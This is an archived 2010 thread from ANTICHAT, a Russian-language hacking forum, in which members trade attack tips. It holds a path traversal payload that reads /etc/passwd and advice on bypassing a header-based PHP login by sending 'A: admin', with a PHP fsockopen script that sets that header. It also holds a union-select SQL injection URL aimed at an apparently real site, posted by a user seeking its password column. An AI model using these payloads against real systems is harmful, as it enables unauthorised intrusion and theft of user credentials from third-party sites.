HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.04.2010, 17:35
hackmon
Познающий
Регистрация: 16.09.2009
Сообщений: 86
Провел на форуме:
362547

Репутация: 93
По умолчанию

Цитата:
Сообщение от Ins3t  
Ну я показал пример самого способа ( хот и не очень удачный, так как не учел условия для выхода за пределы каталога ).
не пашет такое
site.ru/modules.php?name=../../../../../../../etc/passwd//////////////////[..4095..]
.................что можно провести еще?
 
Ответить с цитированием

  #2  
Старый 14.04.2010, 22:55
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

[Feldmarschall],

нет конечно.

Эти программы для тупых и для ленивых! Мне не нужно, чтобы за меня делали мою работу. Мне нужен материал, с каким нужно работать.
 
Ответить с цитированием

  #3  
Старый 14.04.2010, 22:56
Zilt0
Новичок
Регистрация: 01.04.2009
Сообщений: 14
Провел на форуме:
92038

Репутация: 10
По умолчанию

Всем привет,
есть в общем скрипт авторизации,
исходник примерно такой:
if( @$_SERVER['HTTP_A'] != 'admin') {header("Location: notauth.php");exit;}

Что мне надо сделать чтобы в суперглобальном массиве $_SERVER['HTTP_A'] было значение 'admin', или как мне пройти авторизацию?
буду очень благодарен за любые подсказки,
 
Ответить с цитированием

  #4  
Старый 14.04.2010, 22:59
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от Zilt0  
Всем привет,
есть в общем скрипт авторизации,
исходник примерно такой:
if( @$_SERVER['HTTP_A'] != 'admin') {header("Location: notauth.php");exit;}

Что мне надо сделать чтобы в суперглобальном массиве $_SERVER['HTTP_A'] было значение 'admin', или как мне пройти авторизацию?
буду очень благодарен за любые подсказки,

послать заголовок A=admin

Последний раз редактировалось попугай; 14.04.2010 в 23:04..
 
Ответить с цитированием

  #5  
Старый 14.04.2010, 23:12
Zilt0
Новичок
Регистрация: 01.04.2009
Сообщений: 14
Провел на форуме:
92038

Репутация: 10
По умолчанию

Цитата:
Сообщение от попугай  
послать заголовок A=admin

решено,
спасибо огромное!!!

Последний раз редактировалось Zilt0; 14.04.2010 в 23:14..
 
Ответить с цитированием

  #6  
Старый 14.04.2010, 23:14
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от Zilt0  
с помощью Acunetix Web Vulnerability - Http editor, добавляю заголовок HTTP_A, но авторизация не проходит,
может я не то делаю?

надо не HTTP_A, а A.


вот на php пример
PHP код:
echo get('www.entropy.ch''/software/MacOSX/php/test.php''http://google.com/''firefox''');
function 
get($hostname$path$ref$ua$cook)
{
    
$line="";
    
$fp=fsockopen($hostname80$errno$errstr60);
    
        if(!
$fp) echo $errstr($errno);
            else
            {
                
$headers "GET $path HTTP/1.1\r\n";
                
$headers .="Host: $hostname\r\n";
                
$headers .="User-Agent: $ua\r\n";
                
$headers .= "Accept-Language: en,en-US;q=0.9,en;q=0.8\r\n";
                
$headers .= "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\n";
                
$headers .="Cookie: $cook\r\n";
                
$headers .="A: admin\r\n";
                
$headers .="Connection: Close\r\n";
                
$headers .="Referer: $ref\r\n\r\n";
                
                
fwrite($fp$headers);
                

                    while(!
feof($fp)){
                            
                        
$line .= fgets($fp1024);
                    }
                
                
fclose($fp);
            }

    return 
$line;

 
Ответить с цитированием

  #7  
Старый 14.04.2010, 23:06
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

Redwood
скинь сюда название, полное
 
Ответить с цитированием

  #8  
Старый 14.04.2010, 23:09
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию

Цитата:
Сообщение от jecka3000  
Redwood
скинь сюда название, полное
SQLi/XSS/LFI/RFI Exploit Scanner
 
Ответить с цитированием

  #9  
Старый 14.04.2010, 23:14
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


По умолчанию

Просто "A"
 
Ответить с цитированием

  #10  
Старый 14.04.2010, 23:14
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

http://www.kino.ru/forum.php?id=-2274+union+select+1,2,3--
помогите найти столбец паролей. Нашел мыла, логины, пароли найти не могу.
Версия: 4
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.